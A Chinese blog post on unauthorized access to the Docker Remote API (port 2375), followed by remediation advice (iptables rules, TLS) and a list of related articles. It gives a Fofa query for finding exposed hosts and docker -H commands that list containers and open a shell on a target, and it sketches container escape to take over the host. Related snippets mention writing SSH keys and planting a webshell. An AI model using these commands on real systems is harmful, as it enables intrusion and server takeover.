Docker Remote API未授权访问漏洞 *

于 2024-08-05 10:23:28 发布
阅读量386 收藏 1
点赞数 9
分类专栏: 未授权访问漏洞 文章标签: 容器 未授权访问漏洞 DockerRemoteAPI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140919205
版权

Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。

Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的 Docker API,能够方便docker集群的管理和扩展,由docker官方提供。

漏洞信息

Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利用。攻击者无需认证即可访问到Docker数据,可能导致敏感信息泄露,黑客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。

漏洞复现

使用以下Fofa语句搜索Docker产品

port="2375"

直接使用浏览器访问以下路径

使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像

docker -H tcp://ip:2375 ps
docker -H tcp://ip:2375 version
docker -H tcp://ip:2375 exec -it 1f4 /bin/bash
操作思路:
	docker pull 下载有Docker逃逸的容器下来
	docker逃逸间接获取安装docker主机控制权限

漏洞修复

  1. 端口访问控制

对2375端口做网络访问控制,如设置iptables策略仅允许指定的IP来访问Docker接口。

  1. 使用TLS认证

修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure Docker Swarm for TLS这两篇文档,说的是配置好TLS后,Docker CLI 在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。

starhei.zxy
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker remote api授权访问漏洞端口:2375
墨痕诉清风的博客
11-11 4411
授权访问漏洞是因为可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个apiurl输入ip:2375/version就会列出基本信息,和docker version命令效果一样。同样,url为ip:2375/v1.23/containers/json会列出容器信息,和docker ps -a效果一样。...
漏洞挖掘】——94、Docker授权访问
Fly_鹏程万里
06-17 118
Docker是一种开源的容器化平台,用于构建、打包和运行应用程序及其依赖项,它通过使用容器来实现应用程序的轻量级隔离,使得应用程序可以在不同的环境中以一致的方式运行,Docker广泛应用于软件开发、持续集成/持续交付(CI/CD)、微服务架构、大规模部署和云计算等领域,它简化了应用程序的构建、交付。Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行。
DOCKER REMeOTE API 授权访问漏洞复现
weixin_43061533的博客
12-01 743
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
关于docker remote api授权访问漏洞的学习与研究
07-16 632
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Remote API 授权访问漏洞
最新发布
weixin_53736204的博客
08-04 295
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2355
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
docker remote api授权访问_【超详细】Redis 授权访问漏洞
weixin_39747568的博客
11-26 321
0x01 漏洞描述  Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用...
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
docker remote API 漏洞复现
顶峰
04-03 378
引用网上的一些总结流程1. Docker是以root权限运行的,这是所有姿势的前提1.Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录,我们可以参考redis授权访问漏洞,将宿主机的/root/.ssh目录挂载到容器上,然后写入公钥。如果有web目录的话,最差也能上一个webshell。1.
Docker Remote API授权访问
Bird&Bird
03-11 674
Docker是一个开源的应用容器引擎,基于LXC的高级容器引擎,源代码托管在Github 上,基于go语言并遵从Apache2.0协议,开源让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。
Docker Remote API 授权访问
Fly_鹏程万里
01-20 1729
简介 docker 在使用集群管理(如:Kubernetes,swarm)时,要使用remote api对节点进行管理。remote api无认证时的默认端口2375(需要TLS认证默认登录是2376)。 remote api默认是可以不需要认证能直接访问,能直接对docker进行操作,如新建容器,删除容器,查看镜像容器信息等操作。 remote api操作方法可以参考:docker官方文档...
Docker_remote_api授权访问漏洞
weixin_46564680的博客
10-13 2165
Docker_remote_api授权访问漏洞 docker_remote_api简介: docker remote api主要的目的是取代命令行界面, docker client和docker daemon通过unix domain socket进行通信. 默认情况下,只有本机的root和docker组用户才能操作docker. 漏洞成因: dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375 docker守护进程监听在0.0.0.0,外网可
漏洞——Docker远程api授权访问(原理扫描)
龍承leo
10-24 859
Docker远程api授权访问(原理扫描)
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 2420
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
经典版imanager解决Docker Remote Api授权漏洞
wutaotao2015的博客
11-16 652
经典版imanager解决Docker Remote Api授权漏洞 超图集团自研产品imanager推出和交付客户使用已有多年时间,在多个大中型项目中都有使用。目前的系列共有2个,一个是较早的基于docker容器化技术开发的经典版imanager, 也称为docker版 imanager; 另一个就是基于kubernetes架构开发的k8s版imanager。今天我们要讨论的是针对经典版imanager在项目使用过程中,因安全扫描会报出来的其中一个漏洞的解决方案。 生成docker证书 具体步骤见doc
Docker授权访问漏洞
qq_50854662的博客
10-18 1422
Docker授权访问漏洞
Docker Remote API授权访问漏洞分析和利用
热门推荐
3569
12-01 1万+
0x00 概述 最近提交了一些关于 docker remote api 授权访问导致代码泄露、获取服务器root权限的漏洞,造成的影响都比较严重,比如 新姿势之获取果壳全站代码和多台机器root权限 新姿势之控制蜻蜓fm所有服务器 新姿势之获取百度机器root权限 因为之前关注这一块的人并不多,这个方法可以算是一个“新的姿势”,本文对漏洞产生的原因和利用过程进行
Docker Remote API 漏洞分析:无授权访问风险
"Docker Remote API 授权漏洞全球探测1" Docker 是一个广泛应用的开源容器引擎,它采用Go语言编写,并遵循Apache 2.0许可证。Docker的主要功能是允许开发者将应用程序及其依赖打包到轻量级、可移植的容器中,这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值